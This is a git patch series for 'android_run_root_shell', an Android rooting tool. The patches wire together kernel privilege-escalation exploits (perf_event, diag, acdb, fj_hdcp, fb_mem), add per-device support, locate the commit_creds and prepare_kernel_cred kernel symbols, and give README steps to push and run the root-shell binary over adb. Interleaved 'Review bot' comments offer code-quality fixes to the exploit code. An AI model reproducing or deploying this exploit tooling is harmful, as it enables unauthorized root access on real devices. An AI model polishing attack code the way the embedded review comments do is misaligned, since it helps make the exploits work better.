Date: Fri, 5 Jul 2013 20:42:01 +0530
Subject: [PATCH 042/125] update subprojects
---
 device_database | 2 +-
 libdiagexploit | 2 +-
 libperf_event_exploit | 2 +-
 3 files changed, 3 insertions(+), 3 deletions(-)
diff --git a/device_database b/device_database
index d11c8ae..e49824e 160000
--- a/device_database
+++ b/device_database
@@ -1 +1 @@
-Subproject commit d11c8aef7fd94d47dded59c0195d21cee2c797f3
+Subproject commit e49824eef2fa8bc4865e79be6c608e6762813933
diff --git a/libdiagexploit b/libdiagexploit
index 5ee183b..80d0ad5 160000
--- a/libdiagexploit
+++ b/libdiagexploit
@@ -1 +1 @@
-Subproject commit 5ee183b31d4928315a0d7b171680b0ae9b1a7d9c
+Subproject commit 80d0ad59f3a271fa69a2c978de60407bbace4f9d
diff --git a/libperf_event_exploit b/libperf_event_exploit
index b89b9cb..bf2d8c7 160000
--- a/libperf_event_exploit
+++ b/libperf_event_exploit
@@ -1 +1 @@
-Subproject commit b89b9cb75df71c27aa09369fee6d92d906563502
+Subproject commit bf2d8c7482fa410f800b4920322193bc33143916
From 954f38d5735b9e49d707dc8a2ce9dcec4a793032 Mon Sep 17 00:00:00 2001
From: DooMLoRD
Date: Fri, 5 Jul 2013 21:42:50 +0530
Subject: [PATCH 043/125] added support for Xperia Z (C6602/3) - 10.3.A.0.423
---
 device_database | 2 +-
 libperf_event_exploit | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/device_database b/device_database
index e49824e..8cf50a1 160000
--- a/device_database
+++ b/device_database
@@ -1 +1 @@
-Subproject commit e49824eef2fa8bc4865e79be6c608e6762813933
+Subproject commit 8cf50a1296d88a1bf15fe459a8532be0010c9a9a
diff --git a/libperf_event_exploit b/libperf_event_exploit
index bf2d8c7..0ece0cb 160000
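Review bot: If `execl` fails in the new `else` branch (for example when `/system/bin/sh` cannot be executed), control falls through to `exit(EXIT_SUCCESS)` and the caller sees a success status although nothing ran; add `perror("execl"); exit(EXIT_FAILURE);` directly after the `execl` call. The variadic terminator should be written `(char *)NULL` rather than `NULL`, since `NULL` may expand to a plain integer 0 that is not pointer-sized in a variadic argument list. The return value of `system()` on the other branch is still ignored, as it was before this change.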
--- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit bf2d8c7482fa410f800b4920322193bc33143916 +Subproject commit 0ece0cbd0d96973031b80297f65e06afa99678b0 From e32c10941f1a5fa38f06e3498bbdbee6d87e6130 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Fri, 5 Jul 2013 23:15:55 +0530 Subject: [PATCH 044/125] updated subprojects --- device_database | 2 +- libperf_event_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index 8cf50a1..78d450c 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 8cf50a1296d88a1bf15fe459a8532be0010c9a9a +Subproject commit 78d450cf6e06748da824b2e465eb2933a9cc0f1b diff --git a/libperf_event_exploit b/libperf_event_exploit index 0ece0cb..395f270 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 0ece0cbd0d96973031b80297f65e06afa99678b0 +Subproject commit 395f270cd1e68f40b761c8d10e3768614031b9c8 From 6fca3f904ccdfe35a71e2fc0e0ed6ba134f0305c Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Sat, 6 Jul 2013 00:27:52 +0530 Subject: [PATCH 045/125] give preference to perf_event exploit --- main.c | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/main.c b/main.c index 3aeb746..fb8ebcf 100644 --- a/main.c +++ b/main.c @@ -89,11 +89,6 @@ run_exploit(void) ptmx_fsync_address = ptmx_fops_address + 0x38; - printf("Attempt acdb exploit...\n"); - if (attempt_acdb_exploit(ptmx_fsync_address, 0)) { - return true; - } - printf("\n"); printf("Attempt perf_swevent exploit...\n"); if (perf_swevent_run_exploit(ptmx_fsync_address, (int)&obtain_root_privilege, @@ -102,6 +97,12 @@ run_exploit(void) } printf("\n"); + printf("Attempt acdb exploit...\n"); + if (attempt_acdb_exploit(ptmx_fsync_address, 0)) { + return true; + } + printf("\n"); + printf("Attempt fj_hdcp exploit...\n"); if (attempt_fj_hdcp_exploit(ptmx_fsync_address, 0)) { return true; 
From d78eb8c5f7f4fdbbe57e98482cd3d009908c06bc Mon Sep 17 00:00:00 2001
From: DooMLoRD
Date: Sat, 6 Jul 2013 00:31:33 +0530
Subject: [PATCH 046/125] little debug: show detected device right at start
---
 main.c | 15 +++++++++++++++
 1 file changed, 15 insertions(+)
diff --git a/main.c b/main.c
index fb8ebcf..7be82fd 100644
--- a/main.c
+++ b/main.c
@@ -10,6 +10,7 @@
 #include
 #include
+#include
 #include "cred.h"
 #include "mm.h"
 #include "ptmx.h"
@@ -112,6 +113,18 @@ run_exploit(void)
 return attempt_diag_exploit(ptmx_fsync_address);
 }
+void
+device_detected(void)
+{
+ char device[PROP_VALUE_MAX];
+ char build_id[PROP_VALUE_MAX];
+
+ __system_property_get("ro.product.model", device);
+ __system_property_get("ro.build.display.id", build_id);
+
+ printf("\n\nDevice detected: %s (%s)\n\n", device, build_id);
+}
+
 int
 main(int argc, char **argv)
 {
@@ -125,6 +138,8 @@ main(int argc, char **argv)
 }
 }
+ device_detected();
+
 set_kernel_phys_offset(0x200000);
 remap_pfn_range = get_remap_pfn_range_address();
 if (!remap_pfn_range) {
From 2c1eb470dd8ba8922911b40a605ef4d398302ee7 Mon Sep 17 00:00:00 2001
From: DooMLoRD
Date: Sat, 6 Jul 2013 00:58:40 +0530
Subject: [PATCH 047/125] updated subprojects with device support for C5302/3/6, SOL21, LT26i, LT25i, LT28h some firmwares
---
 device_database | 2 +-
 libperf_event_exploit | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/device_database b/device_database
index 78d450c..afc05af 160000
--- a/device_database
+++ b/device_database
@@ -1 +1 @@
-Subproject commit 78d450cf6e06748da824b2e465eb2933a9cc0f1b
+Subproject commit afc05afc5d072a6fc35d663ad81a0791af441b7d
diff --git a/libperf_event_exploit b/libperf_event_exploit
index 395f270..252930e 160000
--- a/libperf_event_exploit
+++ b/libperf_event_exploit
@@ -1 +1 @@
-Subproject commit 395f270cd1e68f40b761c8d10e3768614031b9c8
+Subproject commit 252930e7737f061cb40758f4e4cf8cba2ef3850c
From 5e69530e3d65e377ea2b49315af099b0e6b19033 Mon Sep 17 00:00:00 2001
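Review bot: `device_detected` ignores the return value of both `__system_property_get` calls and passes the `device` and `build_id` buffers to `printf` without initializing them, so if a lookup leaves its buffer untouched the `%s` conversions read indeterminate memory. Declaring them `char device[PROP_VALUE_MAX] = "";` and `char build_id[PROP_VALUE_MAX] = "";` makes the output well-defined whatever the lookup does. The function is also a non-`static` external symbol with no prototype visible here and a single caller in `main`; `static void` matches how `attempt_fj_hdcp_exploit` and `run_exploit` are declared in this file. The header name on the added `#include` line has been stripped in this rendering, so the source of `PROP_VALUE_MAX` cannot be confirmed from the page.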
From: schizoidboy Date: Sat, 6 Jul 2013 10:26:00 -0700 Subject: [PATCH 048/125] Add Building section to README.md --- README.md | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index cdbbc4b..9233a8e 100644 --- a/README.md +++ b/README.md @@ -1,3 +1,13 @@ -# +android_run_root_shell +====================== This code is still ugly, please re-write it and send pull-requests, if you want to use this. + +Building +======== + +* Download Android Native Development Kit (NDK): http://developer.android.com/tools/sdk/ndk/index.html#Downloads +* Extract into some directory and put that in your path: export PATH=ANDK_DIR:$PATH +* In another directory: git clone --recursive https://github.com/android-rooting-tools/android_run_root_shell +* cd android_run_root_shell +* ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk From 01dfcaa234f0c28aac722f57ccad5ddffac0a09d Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Sat, 6 Jul 2013 23:10:50 +0530 Subject: [PATCH 049/125] updated readme --- README.md | 21 +++++++++++++++++---- 1 file changed, 17 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index 9233a8e..a96df76 100644 --- a/README.md +++ b/README.md 
@@ -3,11 +3,24 @@ android_run_root_shell This code is still ugly, please re-write it and send pull-requests, if you want to use this. + Building ======== * Download Android Native Development Kit (NDK): http://developer.android.com/tools/sdk/ndk/index.html#Downloads -* Extract into some directory and put that in your path: export PATH=ANDK_DIR:$PATH -* In another directory: git clone --recursive https://github.com/android-rooting-tools/android_run_root_shell -* cd android_run_root_shell -* ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk + +* Extract into some directory and put that in your path: + `export PATH=ANDK_DIR:$PATH` + +* In another directory clone this repo: + `git clone --recursive https://github.com/android-rooting-tools/android_run_root_shell` + +* Change to the directory where the repo was cloned + `cd android_run_root_shell` + +* To start build process use the following + `ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk` + +* If all goes well you will get the compiled binary at: + `./libs/armeabi/run_root_shell` + From 7f0faa347202e60802b7f6f17b81933419b9bab4 Mon Sep 17 00:00:00 2001 From: schizoidboy Date: Sat, 6 Jul 2013 15:42:41 -0700 Subject: [PATCH 050/125] Add run instructions to README.md --- README.md | 26 +++++++++++++++++++++++++- 1 file changed, 25 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index a96df76..02d7b19 100644 --- a/README.md +++ b/README.md @@ -7,7 +7,7 @@ This code is still ugly, please re-write it and send pull-requests, if you want Building ======== -* Download Android Native Development Kit (NDK): http://developer.android.com/tools/sdk/ndk/index.html#Downloads +* Download the Android Native Development Kit (NDK): http://developer.android.com/tools/sdk/ndk/index.html#Downloads * Extract into some directory and put that in your path: `export PATH=ANDK_DIR:$PATH` 
@@ -24,3 +24,27 @@ Building * If all goes well you will get the compiled binary at: `./libs/armeabi/run_root_shell` + +Running +======= + +* Download the Android Software Development Kit (SDK) ADT Bundle: http://developer.android.com/sdk/index.html + +* Extract into some directory and put the platform-tools folder in your path: + `export PATH=SDK_DIR/sdk/platform-tools/:$PATH` + +* Change to the directory with the combiled run_root_shell binary (see above) + +* Connect your Android device through USB (click Cancel if it asks to enable USB storage; charging only is the correct mode) and enable USB debugging on the device. + +* Start the adb server on your computer: + `sudo adb start-server` + +* Transfer run_root_shell to a temporary directory on the phone: + `adb push run_root_shell /data/local` + +* Ensure that run_root_shell has execute permissions: + `adb shell chmod 777 /data/local/run_root_shell` + +* Run the command on the phone: + `adb shell /data/local/run_root_shell` From dc46b5ff30036596d1fb9cd46aa6c66ec810bc25 Mon Sep 17 00:00:00 2001 From: schizoidboy Date: Sat, 6 Jul 2013 15:43:49 -0700 Subject: [PATCH 051/125] Add run instructions to README.md - fix typo --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 02d7b19..e59b0fe 100644 --- a/README.md +++ b/README.md @@ -33,7 +33,7 @@ Running * Extract into some directory and put the platform-tools folder in your path: `export PATH=SDK_DIR/sdk/platform-tools/:$PATH` -* Change to the directory with the combiled run_root_shell binary (see above) +* Change to the directory with the compiled run_root_shell binary (see above) * Connect your Android device through USB (click Cancel if it asks to enable USB storage; charging only is the correct mode) and enable USB debugging on the device. From 2d40b541fe208077b94be47c56209f4fc0d6dcb5 Mon Sep 17 00:00:00 2001 
From: DooMLoRD Date: Sun, 7 Jul 2013 21:25:28 +0530 Subject: [PATCH 052/125] added support for (M36h) a variant of Xperia ZR (C550X) - 10.1.1.A.1.310 --- device_database | 2 +- libperf_event_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index afc05af..cd0b333 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit afc05afc5d072a6fc35d663ad81a0791af441b7d +Subproject commit cd0b333871ffa00da5163090c1ee6de4bf766421 diff --git a/libperf_event_exploit b/libperf_event_exploit index 252930e..b62982f 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 252930e7737f061cb40758f4e4cf8cba2ef3850c +Subproject commit b62982f136d8d33bcde3c7147525826a4ced0c53 From 67ffd5a07aa2140853bf85635f3ad027f89091c6 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Sun, 7 Jul 2013 23:30:22 +0530 Subject: [PATCH 053/125] added support for Xperia SL (LT26ii) 6.2.B.0.200 --- device_database | 2 +- libperf_event_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index cd0b333..fdd510b 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit cd0b333871ffa00da5163090c1ee6de4bf766421 +Subproject commit fdd510b907e73758d2a2956a472143df786a613e diff --git a/libperf_event_exploit b/libperf_event_exploit index b62982f..e758c12 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit b62982f136d8d33bcde3c7147525826a4ced0c53 +Subproject commit e758c120781d695912c7b87b4deb37420aead29c From 584202d9be1642efb54a7a1a7674491780d50697 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Sun, 7 Jul 2013 23:40:54 +0530 Subject: [PATCH 054/125] added support for Xperia J (ST26i/a) 11.2.A.0.21 --- device_database | 2 +- libperf_event_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index fdd510b..192996f 160000 
--- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit fdd510b907e73758d2a2956a472143df786a613e +Subproject commit 192996fc00b7a62ccd1e0627e5069f89d933d28d diff --git a/libperf_event_exploit b/libperf_event_exploit index e758c12..6b296d8 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit e758c120781d695912c7b87b4deb37420aead29c +Subproject commit 6b296d8a22c289dc7feee3f41a95ef53e9bc9716 From b7168887ec6164b04873c9818f6a93584d7efea5 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Sun, 7 Jul 2013 23:46:18 +0530 Subject: [PATCH 055/125] added support for Xperia J (ST26i/a) 11.2.A.0.31 --- device_database | 2 +- libperf_event_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index 192996f..b7f01fc 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 192996fc00b7a62ccd1e0627e5069f89d933d28d +Subproject commit b7f01fcf8708af3bc0df240defab46370b8d2ab1 diff --git a/libperf_event_exploit b/libperf_event_exploit index 6b296d8..52f2f1f 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 6b296d8a22c289dc7feee3f41a95ef53e9bc9716 +Subproject commit 52f2f1fcc51319799403888974981d7c34685530 From 9ef83172dc527ec5a616ec4794fd3db12219bb6d Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Mon, 8 Jul 2013 00:04:49 +0530 Subject: [PATCH 056/125] added support for Xperia L (C2104/5) 15.0.A.1.31/36 --- device_database | 2 +- libperf_event_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index b7f01fc..0546de0 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit b7f01fcf8708af3bc0df240defab46370b8d2ab1 +Subproject commit 0546de028ed4330bde8ed8c38072624c3af15cd6 diff --git a/libperf_event_exploit b/libperf_event_exploit index 52f2f1f..4071082 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit 
@@ -1 +1 @@ -Subproject commit 52f2f1fcc51319799403888974981d7c34685530 +Subproject commit 4071082bc7580a0030c96c85cc7c31514bbe92d8 From 9ffd97094430e64527d6df7bfc0e6632f322dbf2 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Wed, 17 Jul 2013 04:04:06 +0530 Subject: [PATCH 057/125] added support for Xperia Z (C6606) - 10.1.1.B.0.1.166 --- device_database | 2 +- libperf_event_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index 0546de0..1a9a82f 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 0546de028ed4330bde8ed8c38072624c3af15cd6 +Subproject commit 1a9a82fc819ee1bedab6a06d3f5234c048bfa0d5 diff --git a/libperf_event_exploit b/libperf_event_exploit index 4071082..2411e4b 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 4071082bc7580a0030c96c85cc7c31514bbe92d8 +Subproject commit 2411e4b8c52bfcdb0cf84f86ffb758ef6e069363 From 886cdcbcda61942be24916a66ab3e12dd01a6314 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Sat, 20 Jul 2013 21:24:42 +0530 Subject: [PATCH 058/125] update subproject with latest commits --- device_database | 2 +- libperf_event_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index 1a9a82f..90c65a4 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 1a9a82fc819ee1bedab6a06d3f5234c048bfa0d5 +Subproject commit 90c65a4727e1eefb6f6dd0cb4e69d5d451069130 diff --git a/libperf_event_exploit b/libperf_event_exploit index 2411e4b..41b143b 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 2411e4b8c52bfcdb0cf84f86ffb758ef6e069363 +Subproject commit 41b143b1eb92f8dd107aba06f4c3d91014179ed1 From e6bc328a2405a669689317a2ab5bde705e5096db Mon Sep 17 00:00:00 2001 
From: Hiroyuki Ikezoe Date: Sun, 21 Jul 2013 19:13:23 +0900 Subject: [PATCH 059/125] Update device_database --- device_database | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/device_database b/device_database index 90c65a4..2085d65 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 90c65a4727e1eefb6f6dd0cb4e69d5d451069130 +Subproject commit 2085d65e3c4861cdf7f9223fbf462d2b9f2f2e6f From 5d0fb61778d0831f7eee57c1fc0cc3c642fb9b70 Mon Sep 17 00:00:00 2001 From: Hiroyuki Ikezoe Date: Sun, 21 Jul 2013 19:20:34 +0900 Subject: [PATCH 060/125] Update libperf_event_exploit --- libperf_event_exploit | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/libperf_event_exploit b/libperf_event_exploit index 41b143b..a595dce 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 41b143b1eb92f8dd107aba06f4c3d91014179ed1 +Subproject commit a595dce06ae1d37630be6941b0afd0b6004dc758 From 1ada45b0fd70468787716ee5046aa8d661010294 Mon Sep 17 00:00:00 2001 From: fi01 Date: Tue, 23 Jul 2013 11:31:28 +0900 Subject: [PATCH 061/125] subproject with latest commits --- device_database | 2 +- libmsm_acdb_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index 2085d65..d9fb114 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 2085d65e3c4861cdf7f9223fbf462d2b9f2f2e6f +Subproject commit d9fb114e6b725c218b9d293c300834cd783ddd9b diff --git a/libmsm_acdb_exploit b/libmsm_acdb_exploit index 70332c2..700defd 160000 --- a/libmsm_acdb_exploit +++ b/libmsm_acdb_exploit @@ -1 +1 @@ -Subproject commit 70332c21f236e504ddf578657cba2d884b7f4135 +Subproject commit 700defd15d650a2195b3b2310cc1fa0e09d56e0f From afa2d0b2e8eae4a9b3d0e51985621f43fae11312 Mon Sep 17 00:00:00 2001 
From: Hiroyuki Ikezoe Date: Tue, 23 Jul 2013 19:50:15 +0900 Subject: [PATCH 062/125] Add TARGET_C_INCLUDES to include device_database.h in submodule --- Android.mk | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/Android.mk b/Android.mk index b00a387..70027e3 100644 --- a/Android.mk +++ b/Android.mk @@ -19,6 +19,10 @@ LOCAL_STATIC_LIBRARIES += libmsm_acdb_exploit LOCAL_STATIC_LIBRARIES += libfj_hdcp_exploit LOCAL_STATIC_LIBRARIES += libcutils libc +TOP_SRCDIR := $(abspath $(LOCAL_PATH)) +TARGET_C_INCLUDES += \ + $(TOP_SRCDIR)/device_database + include $(BUILD_EXECUTABLE) include $(call all-makefiles-under,$(LOCAL_PATH)) From e70fb69f9af916852f5e4fb0fab0a13b6ad008f2 Mon Sep 17 00:00:00 2001 From: Hiroyuki Ikezoe Date: Tue, 23 Jul 2013 19:59:53 +0900 Subject: [PATCH 063/125] Update submodules --- device_database | 2 +- libdiagexploit | 2 +- libperf_event_exploit | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/device_database b/device_database index d9fb114..ffe99ec 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit d9fb114e6b725c218b9d293c300834cd783ddd9b +Subproject commit ffe99ec5b334873a4e339675907398e6d9a010e4 diff --git a/libdiagexploit b/libdiagexploit index 80d0ad5..83a2e0c 160000 --- a/libdiagexploit +++ b/libdiagexploit @@ -1 +1 @@ -Subproject commit 80d0ad59f3a271fa69a2c978de60407bbace4f9d +Subproject commit 83a2e0c09765ac7b0f2c2e138590877f37188e1e diff --git a/libperf_event_exploit b/libperf_event_exploit index a595dce..fe2f4f5 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit a595dce06ae1d37630be6941b0afd0b6004dc758 +Subproject commit fe2f4f501acf7f5a35e9415b7b4e944b914d69fd From def3c00833dc33bd9013b39084365b964f1edcc1 Mon Sep 17 00:00:00 2001 From: Hiroyuki Ikezoe Date: Tue, 23 Jul 2013 20:03:47 +0900 Subject: [PATCH 064/125] Change libdiagexploit repos --- .gitmodules | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/.gitmodules b/.gitmodules index 41893e1..a5f19f8 100644 --- a/.gitmodules +++ b/.gitmodules @@ -1,6 +1,6 @@ [submodule "libdiagexploit"] path = libdiagexploit - url = git://github.com/hiikezoe/libdiagexploit.git + url = git://github.com/android-rooting-tools/libdiagexploit.git [submodule "device_database"] path = device_database url = git://github.com/android-rooting-tools/android_device_database.git From 58adb713df9d32cc21675c9bb2580ebac4aaec1f Mon Sep 17 00:00:00 2001 From: Hiroyuki Ikezoe Date: Wed, 24 Jul 2013 19:20:06 +0900 Subject: [PATCH 065/125] Should return false if fsync fails --- main.c | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/main.c b/main.c index 7be82fd..bde10aa 100644 --- a/main.c +++ b/main.c @@ -29,12 +29,13 @@ static bool run_obtain_root_privilege(void *user_data) { int fd; + int ret; fd = open(PTMX_DEVICE, O_WRONLY); - fsync(fd); + ret = fsync(fd); close(fd); - return true; + return (ret == 0); } static bool From 665ec12ddd34f3e563e6ae4f662db90328f4c1ea Mon Sep 17 00:00:00 2001 From: fi01 Date: Thu, 25 Jul 2013 15:02:47 +0900 Subject: [PATCH 066/125] All symbols are detected automatically with libfb_mem_exploit and libkallsyms --- .gitmodules | 6 ++ Android.mk | 7 +- cred.c | 160 +++++++++++++--------------------------- cred.h | 14 +++- device_database | 2 +- exploit.c | 174 ++++++++++++++++++++++++++++++++++++++++++++ exploit.h | 38 ++++++++++ libdiagexploit | 2 +- libfb_mem_exploit | 1 + libfj_hdcp_exploit | 2 +- libkallsyms | 1 + main.c | 149 +++++++++++++++++++++---------------- mm.c | 178 ++++++++++++++++++++++++++++++++++++++++----- mm.h | 20 +++-- ptmx.c | 72 +++++++++++++++--- ptmx.h | 20 ++++- 16 files changed, 633 insertions(+), 213 deletions(-) create mode 100644 exploit.c create mode 100644 exploit.h create mode 160000 libfb_mem_exploit create mode 160000 libkallsyms diff --git a/.gitmodules b/.gitmodules index a5f19f8..b968e90 100644 --- a/.gitmodules +++ b/.gitmodules 
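Review bot: The return value of `open(PTMX_DEVICE, O_WRONLY)` is still unchecked in `run_obtain_root_privilege`, so when the open fails the new code calls `fsync(-1)` and `close(-1)` and the failure is reported only through the generic `ret != 0` path. Guard it right after the open, `if (fd < 0) { printf("Failed to open %s due to %s.\n", PTMX_DEVICE, strerror(errno)); return false; }`, so an unopenable device is distinguishable from a failed fsync. Whether `errno.h`/`string.h` are already included by main.c is not visible from this hunk.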
@@ -13,3 +13,9 @@ [submodule "libfj_hdcp_exploit"] path = libfj_hdcp_exploit url = git://github.com/fi01/libfj_hdcp_exploit.git +[submodule "libkallsyms"] + path = libkallsyms + url = https://github.com/android-rooting-tools/libkallsyms.git +[submodule "libfb_mem_exploit"] + path = libfb_mem_exploit + url = https://github.com/android-rooting-tools/libfb_mem_exploit.git diff --git a/Android.mk b/Android.mk index 70027e3..7961685 100644 --- a/Android.mk +++ b/Android.mk @@ -7,17 +7,20 @@ LOCAL_SRC_FILES := \ kallsyms.c \ main.c \ mm.c \ - ptmx.c + ptmx.c \ + exploit.c LOCAL_MODULE := run_root_shell LOCAL_MODULE_TAGS := optional -LOCAL_FORCE_STATIC_EXECUTABLE := true LOCAL_STATIC_LIBRARIES := libdiagexploit LOCAL_STATIC_LIBRARIES += libdevice_database LOCAL_STATIC_LIBRARIES += libperf_event_exploit LOCAL_STATIC_LIBRARIES += libmsm_acdb_exploit LOCAL_STATIC_LIBRARIES += libfj_hdcp_exploit +LOCAL_STATIC_LIBRARIES += libfb_mem_exploit +LOCAL_STATIC_LIBRARIES += libkallsyms LOCAL_STATIC_LIBRARIES += libcutils libc +LOCAL_LDFLAGS += -static TOP_SRCDIR := $(abspath $(LOCAL_PATH)) TARGET_C_INCLUDES += \ diff --git a/cred.c b/cred.c index 604f289..5c35823 100644 --- a/cred.c +++ b/cred.c 
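Review bot: The two new submodules use `https://` URLs while the existing entries in this file, e.g. the `url = git://github.com/fi01/libfj_hdcp_exploit.git` context line, still use `git://`, which is an unauthenticated and unencrypted transport. The pinned subproject commits give content integrity, but the mixed schemes leave part of the fetch path without transport authentication. Switching the remaining entries to `https://` in this same file would make the submodule set consistent.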
@@ -1,160 +1,104 @@ #include #include -#include -#include -#include -#include -#include -#include #include "cred.h" #include "mm.h" -#include "ptmx.h" -#include "libdiagexploit/diag.h" #include "kallsyms.h" -#include "libperf_event_exploit/perf_event.h" #include "device_database/device_database.h" -static bool -get_creds_functions_addresses(void **prepare_kernel_cred_address, void **commit_creds_address) -{ - *prepare_kernel_cred_address = (void *)device_get_symbol_address(DEVICE_SYMBOL(prepare_kernel_cred)); - *commit_creds_address = (void*)device_get_symbol_address(DEVICE_SYMBOL(commit_creds)); +prepare_kernel_cred_t prepare_kernel_cred; +commit_creds_t commit_creds; - if (*prepare_kernel_cred_address && *commit_creds_address) { +bool +get_prepare_kernel_cred_address(void) +{ + if (prepare_kernel_cred) { return true; } - print_reason_device_not_supported(); - - return false; -} - -static uint32_t PAGE_OFFSET = 0xC0000000; + prepare_kernel_cred = (prepare_kernel_cred_t)device_get_symbol_address(DEVICE_SYMBOL(prepare_kernel_cred)); -static void * -convert_to_kernel_address(void *address, void *mmap_base_address) -{ - return address - mmap_base_address + (void*)PAGE_OFFSET; -} + if (!prepare_kernel_cred && kallsyms_exist()) { + prepare_kernel_cred = kallsyms_get_symbol_address("prepare_kernel_cred"); + } -static void * -convert_to_mmaped_address(void *address, void *mmap_base_address) -{ - return mmap_base_address + (address - (void*)PAGE_OFFSET); + return !!prepare_kernel_cred; } -static uint32_t prepare_kernel_cred_asm[] = { 0xe59f30bc, 0xe3a010d0, 0xe92d4070, 0xe1a04000 }; -static size_t prepare_kernel_cred_asm_length = sizeof(prepare_kernel_cred_asm); -static void * -find_prepare_kernel_cred(void *mem, size_t length) +bool +get_commit_creds_address(void) { - void *prepare_kernel_cred; - - prepare_kernel_cred = memmem(mem, length, &prepare_kernel_cred_asm, prepare_kernel_cred_asm_length); - if (!prepare_kernel_cred) { - printf("Couldn't find prepare_kernel_cred 
address\n"); - return NULL; + if (commit_creds) { + return true; } - return prepare_kernel_cred; -} - -static uint32_t commit_creds_asm[] = { 0xe92d4070, 0xe1a0200d, 0xe3c23d7f, 0xe1a05000 }; -static size_t commit_creds_asm_length = sizeof(prepare_kernel_cred_asm); -static void * -find_commit_creds(void *mem, size_t length) -{ - void *commit_creds; + commit_creds = (commit_creds_t)device_get_symbol_address(DEVICE_SYMBOL(commit_creds)); - commit_creds = memmem(mem, length, &commit_creds_asm, commit_creds_asm_length); - if (!commit_creds) { - printf("Couldn't find commit_creds address\n"); - return NULL; + if (!commit_creds && kallsyms_exist()) { + commit_creds = kallsyms_get_symbol_address("commit_creds"); } - return commit_creds; + return !!commit_creds; } -#define KERNEL_SIZE 0x10000000 +static uint32_t prepare_kernel_cred_asm[] = { 0xe59f30bc, 0xe3a010d0, 0xe92d4070, 0xe1a04000 }; +static size_t prepare_kernel_cred_asm_length = sizeof(prepare_kernel_cred_asm); static bool -find_creds_functions_with_mmap(void *user_data) +find_prepare_kernel_cred_address_in_memory(void *mem, size_t length) { - int fd; void *address; - void *start_address = (void*) 0x10000000; - - fd = open(PTMX_DEVICE, O_RDWR); - address = mmap(start_address, KERNEL_SIZE, - PROT_READ | PROT_WRITE, MAP_SHARED | MAP_FIXED, - fd, 0); - if (address == MAP_FAILED) { - printf("Failed to mmap /dev/ptmx due to %s.\n", strerror(errno)); - close(fd); - return false; - } - prepare_kernel_cred = find_prepare_kernel_cred(address, KERNEL_SIZE); if (prepare_kernel_cred) { - commit_creds = find_commit_creds(prepare_kernel_cred + 4, KERNEL_SIZE); - - prepare_kernel_cred = convert_to_kernel_address(prepare_kernel_cred, address); - commit_creds = convert_to_kernel_address(commit_creds, address); + return true; } - munmap(address, KERNEL_SIZE); - - close(fd); - - return prepare_kernel_cred && commit_creds; -} - 